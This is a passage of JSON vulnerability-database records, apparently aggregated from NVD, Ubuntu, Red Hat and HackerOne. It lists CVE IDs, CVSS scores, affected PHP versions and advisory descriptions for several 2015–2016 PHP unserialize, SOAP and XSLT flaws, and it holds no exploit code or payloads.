"cpe:/a:php:php:5.5.2", "cpe:/a:php:php:5.4.44", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.25", "cpe:/a:php:php:5.6.11", "cpe:/a:php:php:5.5.16", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.19", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.11"], "id": "CVE-2015-6834", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6834", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.44:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:36:36", "description": "The SoapClient __call method in ext/soap/soap.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 does not properly manage headers, which allows remote attackers to execute arbitrary code via crafted serialized data that triggers a \"type confusion\" in the serialize_function_call function.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-01-19T05:59:00", "type": "cve", "title": "CVE-2015-6836", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6836"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:php:php:5.5.28", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.6.10", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.5.22", "cpe:/a:php:php:5.6.1", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.6.12", "cpe:/a:php:php:5.5.27", "cpe:/a:php:php:5.5.26", "cpe:/a:php:php:5.6.0", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.9", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.5.24", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.6.2", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.2", "cpe:/a:php:php:5.4.44", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.25", "cpe:/a:php:php:5.6.11", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.19", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.11"], "id": "CVE-2015-6836", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6836", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.44:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T16:45:00", "description": "The unserialize implementation in ext/standard/var.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted serialized data. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-6834.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-04T20:59:00", "type": "cve", "title": "CVE-2016-9936", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2016-9936"], "modified": "2018-05-04T01:29:00", "cpe": ["cpe:/a:php:php:7.0.11", "cpe:/a:php:php:7.0.12", "cpe:/a:php:php:7.0.9", "cpe:/a:php:php:7.0.2", "cpe:/a:php:php:7.0.1", "cpe:/a:php:php:7.0.7", "cpe:/a:php:php:7.0.4", "cpe:/a:php:php:7.0.13", "cpe:/a:php:php:7.0.0", "cpe:/a:php:php:7.0.5", "cpe:/a:php:php:7.0.3", "cpe:/a:php:php:7.0.6", "cpe:/a:php:php:7.0.8", "cpe:/a:php:php:7.0.10"], "id": "CVE-2016-9936", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9936", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.13:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2022-08-04T14:15:22", "description": "The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP before\n5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13, when libxml2 before\n2.9.2 is used, does not consider the possibility of a NULL valuePop return\nvalue before proceeding with a free operation during initial error\nchecking, which allows remote attackers to cause a denial of service (NULL\npointer dereference and application crash) via a crafted XML document, a\ndifferent vulnerability than CVE-2015-6838.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=69782>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | DoS only?\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2015-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-6837", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-09T00:00:00", "id": "UB:CVE-2015-6837", "href": "https://ubuntu.com/security/CVE-2015-6837", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:15:22", "description": "The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP before\n5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13, when libxml2 before\n2.9.2 is used, does not consider the possibility of a NULL valuePop return\nvalue before proceeding with a free operation after the principal argument\nloop, which allows remote attackers to cause a denial of service (NULL\npointer dereference and application crash) via a crafted XML document, a\ndifferent vulnerability than CVE-2015-6837.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=69782>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | DoS only? \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | same commit as CVE-2015-6837\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2015-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-6838", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-09T00:00:00", "id": "UB:CVE-2015-6838", "href": "https://ubuntu.com/security/CVE-2015-6838", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:15:22", "description": "The session deserializer in PHP before 5.4.45, 5.5.x before 5.5.29, and\n5.6.x before 5.6.13 mishandles multiple php_var_unserialize calls, which\nallow remote attackers to execute arbitrary code or cause a denial of\nservice (use-after-free) via crafted session content.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=70219>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-6835", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6835"], "modified": "2015-09-09T00:00:00", "id": "UB:CVE-2015-6835", "href": "https://ubuntu.com/security/CVE-2015-6835", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:15:22", "description": "Multiple use-after-free vulnerabilities in PHP before 5.4.45, 5.5.x before\n5.5.29, and 5.6.x before 5.6.13 allow remote attackers to execute arbitrary\ncode via vectors related to (1) the Serializable interface, (2) the\nSplObjectStorage class, and (3) the SplDoublyLinkedList class, which are\nmishandled during unserialization.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=70172>\n * <https://bugs.php.net/bug.php?id=70365>\n * <https://bugs.php.net/bug.php?id=70366>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-6834", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834"], "modified": "2015-09-09T00:00:00", "id": "UB:CVE-2015-6834", "href": "https://ubuntu.com/security/CVE-2015-6834", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:15:23", "description": "The SoapClient __call method in ext/soap/soap.c in PHP before 5.4.45, 5.5.x\nbefore 5.5.29, and 5.6.x before 5.6.13 does not properly manage headers,\nwhich allows remote attackers to execute arbitrary code via crafted\nserialized data that triggers a \"type confusion\" in the\nserialize_function_call function.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=70388>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2015-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-6836", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6836"], "modified": "2015-09-09T00:00:00", "id": "UB:CVE-2015-6836", "href": "https://ubuntu.com/security/CVE-2015-6836", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:06:36", "description": "The unserialize implementation in ext/standard/var.c in PHP 7.x before\n7.0.14 allows remote attackers to cause a denial of service\n(use-after-free) or possibly have unspecified other impact via crafted\nserialized data. NOTE: this vulnerability exists because of an incomplete\nfix for CVE-2015-6834.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=72978>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-04T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9936", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2016-9936"], "modified": "2017-01-04T00:00:00", "id": "UB:CVE-2016-9936", "href": "https://ubuntu.com/security/CVE-2016-9936", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2021-10-19T20:38:51", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-6831, CVE-2015-6832, CVE-2015-6834,\nCVE-2015-6835, CVE-2015-6836)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-5589,\nCVE-2015-5590, CVE-2015-6833, CVE-2015-7803, CVE-2015-7804)\n\nTwo NULL pointer dereference flaws were found in the XSLTProcessor class in\nPHP. An attacker could use these flaws to cause a PHP application to crash\nif it performed Extensible Stylesheet Language (XSL) transformations using\nuntrusted XSLT files and allowed the use of PHP functions to be used as\nXSLT functions within XSL stylesheets. (CVE-2015-6837, CVE-2015-6838)\n\nAll rh-php56-php users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd24-httpd service must be restarted for the\nupdate to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-15T00:00:00", "type": "redhat", "title": "(RHSA-2016:0457) Moderate: rh-php56-php security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5589", "CVE-2015-5590", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2018-06-12T21:28:17", "id": "RHSA-2016:0457", "href": "https://access.redhat.com/errata/RHSA-2016:0457", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:13", "bounty": 500.0, "description": "https://bugs.php.net/bug.php?id=70219", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-08-09T00:00:00", "type": "hackerone", "title": "PHP (IBB): Use After Free Vulnerability in session deserializer", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6835"], "modified": "2015-09-01T00:00:00", "id": "H1:103998", "href": "https://hackerone.com/reports/103998", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:13", "bounty": 1000.0, "description": "https://bugs.php.net/bug.php?id=70172", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 